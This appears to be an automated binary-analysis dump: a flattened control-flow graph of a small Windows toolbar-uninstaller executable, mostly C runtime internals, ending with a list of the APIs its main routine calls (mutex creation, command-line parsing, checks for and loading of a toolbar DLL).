3200 711194 __RTC_Initialize 3264 711dde 3200->3264 3201 7110db _fast_error_exit 66 API calls 3201->3200 3203 7111a2 3204 7111ae GetCommandLineW 3203->3204 3338 711411 3203->3338 3279 711d81 GetEnvironmentStringsW 3204->3279 3208 7111bd 3288 711cd3 GetModuleFileNameW 3208->3288 3211 7111d2 3294 711aa4 3211->3294 3212 711411 __amsg_exit 66 API calls 3212->3211 3215 7111e3 3307 7114d0 3215->3307 3216 711411 __amsg_exit 66 API calls 3216->3215 3218 7111ea 3219 7111f5 
__wwincmdln 3218->3219 3220 711411 __amsg_exit 66 API calls 3218->3220 3313 711000 CoInitialize CreateMutexW 3219->3313 3220->3219 3222 711216 3223 711224 3222->3223 3327 711681 3222->3327 3345 7116ad 3223->3345 3226 711229 __msize 3227->3192 3229 711177 3228->3229 3229->3196 3330 7110db 3229->3330 3231 7124a2 3230->3231 3232 7124a9 3230->3232 3348 7113e1 3231->3348 3233 712611 3232->3233 3234 7124b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3232->3234 3407 7121a8 3233->3407 3237 7124fc TlsAlloc 3234->3237 3240 711189 3237->3240 3241 71254a TlsSetValue 3237->3241 3240->3200 3240->3201 3241->3240 3242 71255b 3241->3242 3352 7116cb 3242->3352 3247 71207e __encode_pointer 6 API calls 3248 71257b 3247->3248 3249 71207e __encode_pointer 6 API calls 3248->3249 3250 71258b 3249->3250 3251 71207e __encode_pointer 6 API calls 3250->3251 3252 71259b 3251->3252 3369 712924 3252->3369 3259 7120f9 __decode_pointer 6 API calls 3260 7125ef 3259->3260 3260->3233 3261 7125f6 3260->3261 3389 7121e5 3261->3389 3263 7125fe GetCurrentThreadId 3263->3240 3734 71264c 3264->3734 3266 711dea GetStartupInfoA 3267 713730 __calloc_crt 66 API calls 3266->3267 3275 711e0b 3267->3275 3268 712029 __msize 3268->3203 3269 711fa6 GetStdHandle 3272 711f70 3269->3272 3270 713730 __calloc_crt 66 API calls 3270->3275 3271 71200b SetHandleCount 3271->3268 3272->3268 3272->3269 3272->3271 3273 711fb8 GetFileType 3272->3273 3276 71317c __ioinit InitializeCriticalSectionAndSpinCount 3272->3276 3273->3272 3274 711ef3 3274->3268 3274->3272 3277 711f1c GetFileType 3274->3277 3278 71317c __ioinit InitializeCriticalSectionAndSpinCount 3274->3278 3275->3268 3275->3270 3275->3272 3275->3274 3276->3272 3277->3274 3278->3274 3280 711d92 3279->3280 3281 711d96 3279->3281 3280->3208 3283 7136eb __malloc_crt 66 API calls 3281->3283 3284 711db7 3283->3284 3285 711dbe FreeEnvironmentStringsW 3284->3285 3735 7137f0 3284->3735 3285->3208 3289 711d08 _wparse_cmdline 3288->3289 3290 7111c7 3289->3290 3291 
711d45 3289->3291 3290->3211 3290->3212 3292 7136eb __malloc_crt 66 API calls 3291->3292 3293 711d4b _wparse_cmdline 3292->3293 3293->3290 3295 711abc _wcslen 3294->3295 3299 7111d8 3294->3299 3296 713730 __calloc_crt 66 API calls 3295->3296 3302 711ae0 _wcslen 3296->3302 3297 711b45 3298 7135ee __crtGetStringTypeA_stat 66 API calls 3297->3298 3298->3299 3299->3215 3299->3216 3300 713730 __calloc_crt 66 API calls 3300->3302 3301 711b6b 3303 7135ee __crtGetStringTypeA_stat 66 API calls 3301->3303 3302->3297 3302->3299 3302->3300 3302->3301 3305 711b2a 3302->3305 3739 71367c 3302->3739 3303->3299 3305->3302 3306 712ae2 __invoke_watson 10 API calls 3305->3306 3306->3305 3308 7114de __IsNonwritableInCurrentImage 3307->3308 3748 712dc3 3308->3748 3310 7114fc __initterm_e 3312 71151b __IsNonwritableInCurrentImage __initterm 3310->3312 3752 712dac 3310->3752 3312->3218 3314 711035 GetCommandLineW CommandLineToArgvW 3313->3314 3315 71101f GetLastError 3313->3315 3317 711067 3314->3317 3318 711056 PathFileExistsW 3314->3318 3315->3314 3316 71102c 3315->3316 3316->3222 3320 711084 LoadLibraryW 3317->3320 3318->3317 3319 71106e PathFileExistsW 3318->3319 3319->3317 3319->3320 3321 711091 GetProcAddress 3320->3321 3322 7110aa CloseHandle CoUninitialize 3320->3322 3323 7110a1 3321->3323 3324 7110a3 FreeLibrary 3321->3324 3325 7110c2 3322->3325 3326 7110bb LocalFree 3322->3326 3323->3324 3324->3322 3325->3222 3326->3325 3853 711555 3327->3853 3329 711692 3329->3223 3331 7110e9 3330->3331 3332 7110ee 3330->3332 3333 7118c4 __FF_MSGBANNER 66 API calls 3331->3333 3334 711719 __NMSG_WRITE 66 API calls 3332->3334 3333->3332 3335 7110f6 3334->3335 3336 711465 _doexit 3 API calls 3335->3336 3337 711100 3336->3337 3337->3196 3339 7118c4 __FF_MSGBANNER 66 API calls 3338->3339 3340 71141b 3339->3340 3341 711719 __NMSG_WRITE 66 API calls 3340->3341 3342 711423 3341->3342 3343 7120f9 __decode_pointer 6 API calls 3342->3343 3344 7111ad 3343->3344 3344->3204 3346 711555 _doexit 66 API calls 
3345->3346 3347 7116b8 3346->3347 3347->3226 3349 7113ec Sleep GetModuleHandleW 3348->3349 3350 71140a 3349->3350 3351 71140e 3349->3351 3350->3349 3350->3351 3351->3232 3418 7120f0 3352->3418 3354 7116d3 __init_pointers __initp_misc_winsig 3421 712913 3354->3421 3357 71207e __encode_pointer 6 API calls 3358 71170f 3357->3358 3359 71207e TlsGetValue 3358->3359 3360 7120b7 GetModuleHandleW 3359->3360 3361 712096 3359->3361 3363 7120d2 GetProcAddress 3360->3363 3364 7120c7 3360->3364 3361->3360 3362 7120a0 TlsGetValue 3361->3362 3366 7120ab 3362->3366 3368 7120af 3363->3368 3365 7113e1 __crt_waiting_on_module_handle 2 API calls 3364->3365 3367 7120cd 3365->3367 3366->3360 3366->3368 3367->3363 3367->3368 3368->3247 3370 71292f 3369->3370 3372 7125a8 3370->3372 3424 71317c 3370->3424 3372->3233 3373 7120f9 TlsGetValue 3372->3373 3374 712111 3373->3374 3375 712132 GetModuleHandleW 3373->3375 3374->3375 3378 71211b TlsGetValue 3374->3378 3376 712142 3375->3376 3377 71214d GetProcAddress 3375->3377 3379 7113e1 __crt_waiting_on_module_handle 2 API calls 3376->3379 3380 71212a 3377->3380 3382 712126 3378->3382 3381 712148 3379->3381 3380->3233 3383 713730 3380->3383 3381->3377 3381->3380 3382->3375 3382->3380 3386 713739 3383->3386 3385 7125d5 3385->3233 3385->3259 3386->3385 3387 713757 Sleep 3386->3387 3429 71557f 3386->3429 3388 71376c 3387->3388 3388->3385 3388->3386 3713 71264c 3389->3713 3391 7121f1 GetModuleHandleW 3392 712201 3391->3392 3393 712207 3391->3393 3394 7113e1 __crt_waiting_on_module_handle 2 API calls 3392->3394 3395 712243 3393->3395 3396 71221f GetProcAddress GetProcAddress 3393->3396 3394->3393 3397 712aa0 __lock 62 API calls 3395->3397 3396->3395 3398 712262 InterlockedIncrement 3397->3398 3714 7122ba 3398->3714 3401 712aa0 __lock 62 API calls 3402 712283 3401->3402 3717 713c9e InterlockedIncrement 3402->3717 3404 7122a1 3729 7122c3 3404->3729 3406 7122ae __msize 3406->3263 3408 7121b2 3407->3408 3409 7121be 3407->3409 3410 7120f9 __decode_pointer 6 
API calls 3408->3410 3411 7121e0 3409->3411 3412 7121d2 TlsFree 3409->3412 3410->3409 3413 71298b DeleteCriticalSection 3411->3413 3415 7129a3 3411->3415 3412->3411 3414 7135ee __crtGetStringTypeA_stat 66 API calls 3413->3414 3414->3411 3416 7129b5 DeleteCriticalSection 3415->3416 3417 7129c3 3415->3417 3416->3415 3417->3240 3419 71207e __encode_pointer 6 API calls 3418->3419 3420 7120f7 3419->3420 3420->3354 3422 71207e __encode_pointer 6 API calls 3421->3422 3423 711705 3422->3423 3423->3357 3428 71264c 3424->3428 3426 713188 InitializeCriticalSectionAndSpinCount 3427 7131cc __msize 3426->3427 3427->3370 3428->3426 3430 71558b __msize 3429->3430 3431 7155a3 3430->3431 3441 7155c2 __crtGetStringTypeA_stat 3430->3441 3442 712c72 3431->3442 3434 715634 HeapAlloc 3434->3441 3438 7155b8 __msize 3438->3386 3441->3434 3441->3438 3448 712aa0 3441->3448 3455 714dc3 3441->3455 3461 71567b 3441->3461 3464 7131eb 3441->3464 3467 7122cc GetLastError 3442->3467 3444 712c77 3445 712c0a 3444->3445 3446 7120f9 __decode_pointer 6 API calls 3445->3446 3447 712c1a __invoke_watson 3446->3447 3449 712ab5 3448->3449 3450 712ac8 EnterCriticalSection 3448->3450 3509 7129dd 3449->3509 3450->3441 3452 712abb 3452->3450 3453 711411 __amsg_exit 65 API calls 3452->3453 3454 712ac7 3453->3454 3454->3450 3458 714df1 3455->3458 3456 714e8a 3460 714e93 3456->3460 3708 7149da 3456->3708 3458->3456 3458->3460 3701 71492a 3458->3701 3460->3441 3712 7129c6 LeaveCriticalSection 3461->3712 3463 715682 3463->3441 3465 7120f9 __decode_pointer 6 API calls 3464->3465 3466 7131fb 3465->3466 3466->3441 3481 712174 TlsGetValue 3467->3481 3470 712339 SetLastError 3470->3444 3471 713730 __calloc_crt 63 API calls 3472 7122f7 3471->3472 3472->3470 3473 7120f9 __decode_pointer 6 API calls 3472->3473 3474 712311 3473->3474 3475 712330 3474->3475 3476 712318 3474->3476 3486 7135ee 3475->3486 3478 7121e5 __mtinit 63 API calls 3476->3478 3480 712320 GetCurrentThreadId 3478->3480 3479 712336 3479->3470 3480->3470 3482 
7121a4 3481->3482 3483 712189 3481->3483 3482->3470 3482->3471 3484 7120f9 __decode_pointer 6 API calls 3483->3484 3485 712194 TlsSetValue 3484->3485 3485->3482 3488 7135fa __msize 3486->3488 3487 713673 _realloc __msize 3487->3479 3488->3487 3489 713639 3488->3489 3491 712aa0 __lock 64 API calls 3488->3491 3489->3487 3490 71364e HeapFree 3489->3490 3490->3487 3492 713660 3490->3492 3495 713611 ___sbh_find_block 3491->3495 3493 712c72 __msize 64 API calls 3492->3493 3494 713665 GetLastError 3493->3494 3494->3487 3496 71362b 3495->3496 3499 714614 3495->3499 3505 713644 3496->3505 3500 714653 3499->3500 3504 7148f5 ___sbh_free_block 3499->3504 3501 71483f VirtualFree 3500->3501 3500->3504 3502 7148a3 3501->3502 3503 7148b2 VirtualFree HeapFree 3502->3503 3502->3504 3503->3504 3504->3496 3508 7129c6 LeaveCriticalSection 3505->3508 3507 71364b 3507->3489 3508->3507 3510 7129e9 __msize 3509->3510 3511 712a0f 3510->3511 3535 7118c4 3510->3535 3517 712a1f __msize 3511->3517 3581 7136eb 3511->3581 3517->3452 3519 712a31 3522 712c72 __msize 66 API calls 3519->3522 3520 712a40 3523 712aa0 __lock 66 API calls 3520->3523 3522->3517 3524 712a47 3523->3524 3525 712a7b 3524->3525 3526 712a4f 3524->3526 3528 7135ee __crtGetStringTypeA_stat 66 API calls 3525->3528 3527 71317c __ioinit InitializeCriticalSectionAndSpinCount 3526->3527 3529 712a5a 3527->3529 3530 712a6c 3528->3530 3529->3530 3531 7135ee __crtGetStringTypeA_stat 66 API calls 3529->3531 3586 712a97 3530->3586 3533 712a66 3531->3533 3534 712c72 __msize 66 API calls 3533->3534 3534->3530 3589 7135a3 3535->3589 3538 7118d8 3540 711719 __NMSG_WRITE 66 API calls 3538->3540 3542 7118fa 3538->3542 3539 7135a3 __set_error_mode 66 API calls 3539->3538 3541 7118f0 3540->3541 3543 711719 __NMSG_WRITE 66 API calls 3541->3543 3544 711719 3542->3544 3543->3542 3545 71172d 3544->3545 3546 7135a3 __set_error_mode 63 API calls 3545->3546 3577 711888 3545->3577 3547 71174f 3546->3547 3548 71188d GetStdHandle 3547->3548 3550 7135a3 
__set_error_mode 63 API calls 3547->3550 3549 71189b _strlen 3548->3549 3548->3577 3553 7118b4 WriteFile 3549->3553 3549->3577 3551 711760 3550->3551 3551->3548 3552 711772 3551->3552 3552->3577 3595 71353b 3552->3595 3553->3577 3556 7117a8 GetModuleFileNameA 3558 7117c6 3556->3558 3563 7117e9 _strlen 3556->3563 3560 71353b _strcpy_s 63 API calls 3558->3560 3561 7117d6 3560->3561 3561->3563 3564 712ae2 __invoke_watson 10 API calls 3561->3564 3562 71182c 3620 71337c 3562->3620 3563->3562 3611 7133f0 3563->3611 3564->3563 3569 711850 3571 71337c _strcat_s 63 API calls 3569->3571 3570 712ae2 __invoke_watson 10 API calls 3570->3569 3573 711864 3571->3573 3572 712ae2 __invoke_watson 10 API calls 3572->3562 3574 711875 3573->3574 3575 712ae2 __invoke_watson 10 API calls 3573->3575 3629 713213 3574->3629 3575->3574 3578 711465 3577->3578 3667 71143a GetModuleHandleW 3578->3667 3583 7136f4 3581->3583 3584 712a2a 3583->3584 3585 71370b Sleep 3583->3585 3671 7154b5 3583->3671 3584->3519 3584->3520 3585->3583 3700 7129c6 LeaveCriticalSection 3586->3700 3588 712a9e 3588->3517 3590 7135b2 3589->3590 3591 7118cb 3590->3591 3592 712c72 __msize 66 API calls 3590->3592 3591->3538 3591->3539 3593 7135d5 3592->3593 3594 712c0a __msize 6 API calls 3593->3594 3594->3591 3596 71354c 3595->3596 3598 713553 3595->3598 3596->3598 3602 713579 3596->3602 3597 712c72 __msize 66 API calls 3599 713558 3597->3599 3598->3597 3600 712c0a __msize 6 API calls 3599->3600 3601 711794 3600->3601 3601->3556 3604 712ae2 3601->3604 3602->3601 3603 712c72 __msize 66 API calls 3602->3603 3603->3599 3656 715320 3604->3656 3606 712b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3607 712beb GetCurrentProcess TerminateProcess 3606->3607 3608 712bdf __invoke_watson 3606->3608 3658 7110cc 3607->3658 3608->3607 3610 7117a5 3610->3556 3612 713402 3611->3612 3615 713406 3612->3615 3617 711819 3612->3617 3618 71344c 3612->3618 3613 712c72 __msize 66 API calls 3614 713422 3613->3614 3616 
712c0a __msize 6 API calls 3614->3616 3615->3613 3615->3617 3616->3617 3617->3562 3617->3572 3618->3617 3619 712c72 __msize 66 API calls 3618->3619 3619->3614 3621 713394 3620->3621 3622 71338d 3620->3622 3623 712c72 __msize 66 API calls 3621->3623 3622->3621 3626 7133c8 3622->3626 3628 713399 3623->3628 3624 712c0a __msize 6 API calls 3625 71183f 3624->3625 3625->3569 3625->3570 3626->3625 3627 712c72 __msize 66 API calls 3626->3627 3627->3628 3628->3624 3630 7120f0 ___crtMessageBoxW 6 API calls 3629->3630 3631 713223 3630->3631 3632 713236 LoadLibraryA 3631->3632 3655 7132be 3631->3655 3633 713360 3632->3633 3634 71324b GetProcAddress 3632->3634 3633->3577 3634->3633 3636 713261 3634->3636 3635 713313 3638 7120f9 __decode_pointer 6 API calls 3635->3638 3637 71207e __encode_pointer 6 API calls 3636->3637 3641 713267 GetProcAddress 3637->3641 3638->3633 3639 7120f9 __decode_pointer 6 API calls 3649 71332b 3639->3649 3640 7120f9 __decode_pointer 6 API calls 3642 7132db 3640->3642 3644 71207e __encode_pointer 6 API calls 3641->3644 3643 7120f9 __decode_pointer 6 API calls 3642->3643 3647 7132e8 3643->3647 3645 71327c GetProcAddress 3644->3645 3646 71207e __encode_pointer 6 API calls 3645->3646 3648 713291 GetProcAddress 3646->3648 3647->3635 3647->3639 3650 71207e __encode_pointer 6 API calls 3648->3650 3649->3635 3651 7120f9 __decode_pointer 6 API calls 3649->3651 3652 7132a6 3650->3652 3651->3635 3653 7132b0 GetProcAddress 3652->3653 3652->3655 3654 71207e __encode_pointer 6 API calls 3653->3654 3654->3655 3655->3640 3655->3647 3657 71532c __VEC_memzero 3656->3657 3657->3606 3659 7110d4 3658->3659 3660 7110d6 IsDebuggerPresent 3658->3660 3659->3610 3666 7128d2 3660->3666 3663 711358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3664 711375 __invoke_watson 3663->3664 3665 71137d GetCurrentProcess TerminateProcess 3663->3665 3664->3665 3665->3610 3666->3663 3668 711463 ExitProcess 3667->3668 3669 71144e GetProcAddress 3667->3669 3669->3668 3670 71145e 
3669->3670 3670->3668 3672 715568 3671->3672 3681 7154c7 3671->3681 3673 7131eb __calloc_impl 6 API calls 3672->3673 3674 71556e 3673->3674 3676 712c72 __msize 65 API calls 3674->3676 3675 7118c4 __FF_MSGBANNER 65 API calls 3675->3681 3687 715560 3676->3687 3678 711719 __NMSG_WRITE 65 API calls 3678->3681 3679 715524 HeapAlloc 3679->3681 3680 711465 _doexit 3 API calls 3680->3681 3681->3675 3681->3678 3681->3679 3681->3680 3682 715554 3681->3682 3683 7131eb __calloc_impl 6 API calls 3681->3683 3685 715559 3681->3685 3681->3687 3688 715466 3681->3688 3684 712c72 __msize 65 API calls 3682->3684 3683->3681 3684->3685 3686 712c72 __msize 65 API calls 3685->3686 3686->3687 3687->3583 3689 715472 __msize 3688->3689 3690 7154a3 __msize 3689->3690 3691 712aa0 __lock 66 API calls 3689->3691 3690->3681 3692 715488 3691->3692 3693 714dc3 ___sbh_alloc_block 5 API calls 3692->3693 3694 715493 3693->3694 3696 7154ac 3694->3696 3699 7129c6 LeaveCriticalSection 3696->3699 3698 7154b3 3698->3690 3699->3698 3700->3588 3702 714971 HeapAlloc 3701->3702 3703 71493d HeapReAlloc 3701->3703 3704 714994 VirtualAlloc 3702->3704 3705 71495b 3702->3705 3703->3705 3706 71495f 3703->3706 3704->3705 3707 7149ae HeapFree 3704->3707 3705->3456 3706->3702 3707->3705 3709 7149f1 VirtualAlloc 3708->3709 3711 714a38 3709->3711 3711->3460 3712->3463 3713->3391 3732 7129c6 LeaveCriticalSection 3714->3732 3716 71227c 3716->3401 3718 713cbc InterlockedIncrement 3717->3718 3719 713cbf 3717->3719 3718->3719 3720 713cc9 InterlockedIncrement 3719->3720 3721 713ccc 3719->3721 3720->3721 3722 713cd6 InterlockedIncrement 3721->3722 3723 713cd9 3721->3723 3722->3723 3724 713ce3 InterlockedIncrement 3723->3724 3726 713ce6 3723->3726 3724->3726 3725 713cff InterlockedIncrement 3725->3726 3726->3725 3727 713d0f InterlockedIncrement 3726->3727 3728 713d1a InterlockedIncrement 3726->3728 3727->3726 3728->3404 3733 7129c6 LeaveCriticalSection 3729->3733 3731 7122ca 3731->3406 3732->3716 3733->3731 3734->3266 3736 
713808 3735->3736 3737 711dd3 3736->3737 3738 71382f __VEC_memcpy 3736->3738 3737->3285 3738->3737 3740 713694 3739->3740 3741 71368d 3739->3741 3742 712c72 __msize 66 API calls 3740->3742 3741->3740 3743 7136c0 3741->3743 3747 713699 3742->3747 3745 7136a8 3743->3745 3746 712c72 __msize 66 API calls 3743->3746 3744 712c0a __msize 6 API calls 3744->3745 3745->3302 3746->3747 3747->3744 3749 712dc9 3748->3749 3750 71207e __encode_pointer 6 API calls 3749->3750 3751 712de1 3749->3751 3750->3749 3751->3310 3755 712d70 3752->3755 3754 712db9 3754->3312 3756 712d7c __msize 3755->3756 3763 71147d 3756->3763 3762 712d9d __msize 3762->3754 3764 712aa0 __lock 66 API calls 3763->3764 3765 711484 3764->3765 3766 712c85 3765->3766 3767 7120f9 __decode_pointer 6 API calls 3766->3767 3768 712c99 3767->3768 3769 7120f9 __decode_pointer 6 API calls 3768->3769 3770 712ca9 3769->3770 3771 712d2c 3770->3771 3786 71539a 3770->3786 3783 712da6 3771->3783 3773 712d13 3774 71207e __encode_pointer 6 API calls 3773->3774 3775 712d21 3774->3775 3779 71207e __encode_pointer 6 API calls 3775->3779 3776 712ceb 3776->3771 3780 71377c __realloc_crt 73 API calls 3776->3780 3781 712d01 3776->3781 3777 712cc7 3777->3773 3777->3776 3799 71377c 3777->3799 3779->3771 3780->3781 3781->3771 3782 71207e __encode_pointer 6 API calls 3781->3782 3782->3773 3849 711486 3783->3849 3787 7153a6 __msize 3786->3787 3788 7153b6 3787->3788 3791 7153d3 3787->3791 3789 712c72 __msize 66 API calls 3788->3789 3792 7153bb 3789->3792 3790 715414 HeapSize 3795 7153cb __msize 3790->3795 3791->3790 3793 712aa0 __lock 66 API calls 3791->3793 3794 712c0a __msize 6 API calls 3792->3794 3796 7153e3 ___sbh_find_block 3793->3796 3794->3795 3795->3777 3804 715434 3796->3804 3803 713785 3799->3803 3801 7137c4 3801->3776 3802 7137a5 Sleep 3802->3803 3803->3801 3803->3802 3808 71569d 3803->3808 3807 7129c6 LeaveCriticalSection 3804->3807 3806 71540f 3806->3790 3806->3795 3807->3806 3809 7156a9 __msize 3808->3809 3810 7156b0 
3809->3810 3811 7156be 3809->3811 3812 7154b5 _malloc 66 API calls 3810->3812 3813 7156d1 3811->3813 3814 7156c5 3811->3814 3835 7156b8 _realloc __msize 3812->3835 3820 715843 3813->3820 3833 7156de ___sbh_resize_block ___sbh_find_block 3813->3833 3815 7135ee __crtGetStringTypeA_stat 66 API calls 3814->3815 3815->3835 3816 715876 3818 7131eb __calloc_impl 6 API calls 3816->3818 3817 715848 HeapReAlloc 3817->3820 3817->3835 3821 71587c 3818->3821 3819 712aa0 __lock 66 API calls 3819->3833 3820->3816 3820->3817 3822 71589a 3820->3822 3824 7131eb __calloc_impl 6 API calls 3820->3824 3826 715890 3820->3826 3823 712c72 __msize 66 API calls 3821->3823 3825 712c72 __msize 66 API calls 3822->3825 3822->3835 3823->3835 3824->3820 3827 7158a3 GetLastError 3825->3827 3829 712c72 __msize 66 API calls 3826->3829 3827->3835 3844 715811 3829->3844 3830 715769 HeapAlloc 3830->3833 3831 7157be HeapReAlloc 3831->3833 3832 715816 GetLastError 3832->3835 3833->3816 3833->3819 3833->3830 3833->3831 3834 714dc3 ___sbh_alloc_block 5 API calls 3833->3834 3833->3835 3836 715829 3833->3836 3837 7131eb __calloc_impl 6 API calls 3833->3837 3839 714614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3833->3839 3841 71580c 3833->3841 3842 7137f0 __VEC_memcpy _realloc 3833->3842 3845 7157e1 3833->3845 3834->3833 3835->3803 3836->3835 3838 712c72 __msize 66 API calls 3836->3838 3837->3833 3840 715836 3838->3840 3839->3833 3840->3827 3840->3835 3843 712c72 __msize 66 API calls 3841->3843 3842->3833 3843->3844 3844->3832 3844->3835 3848 7129c6 LeaveCriticalSection 3845->3848 3847 7157e8 3847->3833 3848->3847 3852 7129c6 LeaveCriticalSection 3849->3852 3851 71148d 3851->3762 3852->3851 3854 711561 __msize 3853->3854 3855 712aa0 __lock 66 API calls 3854->3855 3856 711568 3855->3856 3857 711631 __initterm 3856->3857 3859 711594 3856->3859 3872 71166c 3857->3872 3861 7120f9 __decode_pointer 6 API calls 3859->3861 3863 71159f 3861->3863 3862 711669 __msize 3862->3329 3865 711621 __initterm 3863->3865 
3867 7120f9 __decode_pointer 6 API calls 3863->3867 3865->3857 3866 711660 3868 711465 _doexit 3 API calls 3866->3868 3870 7115b4 3867->3870 3868->3862 3869 7120f0 6 API calls ___crtMessageBoxW 3869->3870 3870->3865 3870->3869 3871 7120f9 6 API calls __decode_pointer 3870->3871 3871->3870 3873 711672 3872->3873 3874 71164d 3872->3874 3877 7129c6 LeaveCriticalSection 3873->3877 3874->3862 3876 7129c6 LeaveCriticalSection 3874->3876 3876->3866 3877->3874 4139 714247 4149 7141cb 4139->4149 4142 714272 setSBCS 4143 7110cc __crtGetStringTypeA_stat 5 API calls 4142->4143 4144 71442a 4143->4144 4145 7142b6 IsValidCodePage 4145->4142 4146 7142c8 GetCPInfo 4145->4146 4146->4142 4147 7142db __setmbcp_nolock __crtGetStringTypeA_stat 4146->4147 4156 713f0d GetCPInfo 4147->4156 4166 714144 4149->4166 4152 714208 4154 71420d GetACP 4152->4154 4155 7141fa 4152->4155 4153 7141ea GetOEMCP 4153->4155 4154->4155 4155->4142 4155->4145 4155->4147 4157 713ff3 4156->4157 4161 713f41 __crtGetStringTypeA_stat 4156->4161 4160 7110cc __crtGetStringTypeA_stat 5 API calls 4157->4160 4164 71409e 4160->4164 4226 715fe2 4161->4226 4164->4147 4165 716415 ___crtLCMapStringA 101 API calls 4165->4157 4167 714157 4166->4167 4172 7141a4 4166->4172 4174 712345 4167->4174 4171 714184 4171->4172 4194 7140a0 4171->4194 4172->4152 4172->4153 4175 7122cc __getptd_noexit 66 API calls 4174->4175 4176 71234d 4175->4176 4177 71235a 4176->4177 4178 711411 __amsg_exit 66 API calls 4176->4178 4177->4171 4179 713e04 4177->4179 4178->4177 4180 713e10 __msize 4179->4180 4181 712345 __getptd 66 API calls 4180->4181 4182 713e15 4181->4182 4183 713e43 4182->4183 4185 713e27 4182->4185 4184 712aa0 __lock 66 API calls 4183->4184 4186 713e4a 4184->4186 4187 712345 __getptd 66 API calls 4185->4187 4210 713dc6 4186->4210 4189 713e2c 4187->4189 4191 713e3a __msize 4189->4191 4193 711411 __amsg_exit 66 API calls 4189->4193 4191->4171 4193->4191 4195 7140ac __msize 4194->4195 4196 712345 __getptd 66 API calls 4195->4196 4197 
7140b1 4196->4197 4198 712aa0 __lock 66 API calls 4197->4198 4201 7140c3 4197->4201 4199 7140e1 4198->4199 4200 71412a 4199->4200 4202 714112 InterlockedIncrement 4199->4202 4203 7140f8 InterlockedDecrement 4199->4203 4222 71413b 4200->4222 4205 711411 __amsg_exit 66 API calls 4201->4205 4206 7140d1 __msize 4201->4206 4202->4200 4203->4202 4207 714103 4203->4207 4205->4206 4206->4172 4207->4202 4208 7135ee __crtGetStringTypeA_stat 66 API calls 4207->4208 4209 714111 4208->4209 4209->4202 4211 713dca 4210->4211 4217 713dfc 4210->4217 4212 713c9e ___addlocaleref 8 API calls 4211->4212 4211->4217 4213 713ddd 4212->4213 4214 713d2d ___removelocaleref 8 API calls 4213->4214 4213->4217 4215 713de8 4214->4215 4216 713b55 ___freetlocinfo 66 API calls 4215->4216 4215->4217 4216->4217 4218 713e6e 4217->4218 4221 7129c6 LeaveCriticalSection 4218->4221 4220 713e75 4220->4189 4221->4220 4225 7129c6 LeaveCriticalSection 4222->4225 4224 714142 4224->4201 4225->4224 4227 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4226->4227 4228 715ff5 4227->4228 4236 715e28 4228->4236 4231 716415 4232 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4231->4232 4233 716428 4232->4233 4324 716070 4233->4324 4237 715e74 4236->4237 4238 715e49 GetStringTypeW 4236->4238 4239 715f5b 4237->4239 4240 715e61 4237->4240 4238->4240 4241 715e69 GetLastError 4238->4241 4264 716b1a GetLocaleInfoA 4239->4264 4242 715ead MultiByteToWideChar 4240->4242 4253 715f55 4240->4253 4241->4237 4248 715eda 4242->4248 4242->4253 4244 7110cc __crtGetStringTypeA_stat 5 API calls 4246 713fae 4244->4246 4246->4231 4247 715fac GetStringTypeA 4252 715fc7 4247->4252 4247->4253 4249 7154b5 _malloc 66 API calls 4248->4249 4254 715eef __alloca_probe_16 __crtGetStringTypeA_stat 4248->4254 4249->4254 4251 715f28 MultiByteToWideChar 4256 715f4f 4251->4256 4257 715f3e GetStringTypeW 4251->4257 4258 7135ee __crtGetStringTypeA_stat 66 API calls 4252->4258 4253->4244 4254->4251 4254->4253 4260 715446 4256->4260 4257->4256 4258->4253 
4261 715452 4260->4261 4262 715463 4260->4262 4261->4262 4263 7135ee __crtGetStringTypeA_stat 66 API calls 4261->4263 4262->4253 4263->4262 4265 716b48 4264->4265 4266 716b4d 4264->4266 4268 7110cc __crtGetStringTypeA_stat 5 API calls 4265->4268 4295 716b04 4266->4295 4269 715f7f 4268->4269 4269->4247 4269->4253 4270 716b63 4269->4270 4271 716ba3 GetCPInfo 4270->4271 4272 716c2d 4270->4272 4273 716c18 MultiByteToWideChar 4271->4273 4274 716bba 4271->4274 4275 7110cc __crtGetStringTypeA_stat 5 API calls 4272->4275 4273->4272 4279 716bd3 _strlen 4273->4279 4274->4273 4276 716bc0 GetCPInfo 4274->4276 4277 715fa0 4275->4277 4276->4273 4278 716bcd 4276->4278 4277->4247 4277->4253 4278->4273 4278->4279 4280 7154b5 _malloc 66 API calls 4279->4280 4284 716c05 __alloca_probe_16 __crtGetStringTypeA_stat 4279->4284 4280->4284 4281 716c62 MultiByteToWideChar 4282 716c99 4281->4282 4283 716c7a 4281->4283 4285 715446 __freea 66 API calls 4282->4285 4286 716c81 WideCharToMultiByte 4283->4286 4287 716c9e 4283->4287 4284->4272 4284->4281 4285->4272 4286->4282 4288 716ca9 WideCharToMultiByte 4287->4288 4289 716cbd 4287->4289 4288->4282 4288->4289 4290 713730 __calloc_crt 66 API calls 4289->4290 4291 716cc5 4290->4291 4291->4282 4292 716cce WideCharToMultiByte 4291->4292 4292->4282 4293 716ce0 4292->4293 4294 7135ee __crtGetStringTypeA_stat 66 API calls 4293->4294 4294->4282 4298 716f7a 4295->4298 4299 716f93 4298->4299 4302 716d4b 4299->4302 4303 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4302->4303 4305 716d60 4303->4305 4304 716d72 4306 712c72 __msize 66 API calls 4304->4306 4305->4304 4310 716daf 4305->4310 4307 716d77 4306->4307 4308 712c0a __msize 6 API calls 4307->4308 4313 716b15 4308->4313 4311 716df4 4310->4311 4314 7169e5 4310->4314 4312 712c72 __msize 66 API calls 4311->4312 4311->4313 4312->4313 4313->4265 4315 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4314->4315 4316 7169f9 4315->4316 4320 716a06 4316->4320 4321 716acc 4316->4321 4319 715fe2 

                                                Control-flow Graph

                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00711006
                                                • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00711013
                                                • GetLastError.KERNEL32 ref: 0071101F
                                                • GetCommandLineW.KERNEL32(?), ref: 00711040
                                                • CommandLineToArgvW.SHELL32(00000000), ref: 00711047
                                                • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00711061
                                                • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00711073
                                                • LoadLibraryW.KERNELBASE(?), ref: 00711085
